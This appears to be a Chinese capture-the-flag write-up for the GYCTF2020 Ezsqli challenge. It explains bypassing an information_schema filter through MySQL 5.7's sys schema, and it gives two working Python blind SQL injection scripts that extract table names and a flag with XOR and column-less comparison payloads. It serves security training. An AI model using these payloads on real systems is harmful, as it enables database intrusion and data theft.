-
[GYCTF2020]Ezsqli
先试一下万能密码
1' or 1=1#
发现有过滤,fuzz看一下过滤了什么
if,|,|| 没过滤,过滤了information_schema
MySQL5.7新特性:
由于performance_schema过于复杂,所以mysql在5.7版本中新增了sys schemma,基础数据来自于performance_chema和information_schema两个库,本身数据库不存储数据。information_schema.tables可以用sys.schema_table_statistics_with_buffer或sys.x$schema_table_statistics_with_buffer代替。脚本:
- import requests
- import time
- flag=""
- src = "qwertyuiopasdfghjklzxcvbnm|1234567890?{_+}-=;',./<>!@#$%^&*()\""
- url = "http://19fd2d53-da0b-4dc7-9a3d-cf3e98da329e.node4.buuoj.cn:81/index.php"
- for i in range(1,50):
- print(i)
- for j in src:
- pyload ={
- "id":"1^(ascii(substr((select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()),%d,1))=%d)^1" % (i, ord(j))
- }
- time.sleep(0.5)
- res=requests.post(url=url, data=pyload)
- if 'Nu1L' in res.text:
- print(i)
- flag+=j
- print(flag)
- break
- #users233333333333333, f1ag_1s_h3r3_hhhhh
这里 涉及到的是无列名注入
比较方式就是按照位比较ASCII大小,大的就大,举个例子
asd > abc
asd < flag
asd > absadasda
只要出现了大,那就是大
所以下面就是按照ASCII顺序去比较字符串,最后要减1是因为我们拿的是大于嘛,减1就是等于了- import requests
- import time
- url='http://19fd2d53-da0b-4dc7-9a3d-cf3e98da329e.node4.buuoj.cn:81/index.php'
- flag=''
- for j in range(1,50):
- for i in range(32,128):
- hexchar=flag+chr(i)
- payload='-1||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
- datas={'id':payload}
- print(payload)
- time.sleep(0.5)
- re=requests.post(url=url,data=datas)
- if 'Nu1L' in re.text:
- flag+=chr(i-1)
- print(flag)
- break
- print(flag.lower())
得到flag的字母是大写的,改成小写就行了
-
相关阅读:
从Series到DataFrame:Python数据操作的转换技巧
uniapp开发小程序,包过大解决方案
第三十七章 在 UNIX®、Linux 和 macOS 上使用 IRIS(二)
【初试396分】西北工业大学827学长经验分享
地磁查询网站
thinkphp 5.1使用redis缓存取数据
网络安全(黑客)——2024自学
.NET Core Hangfire任务计划
三十四、Fluent液体喷雾蒸发模拟
ceph文件系统
- 原文地址:https://blog.csdn.net/Yb_140/article/details/128060507
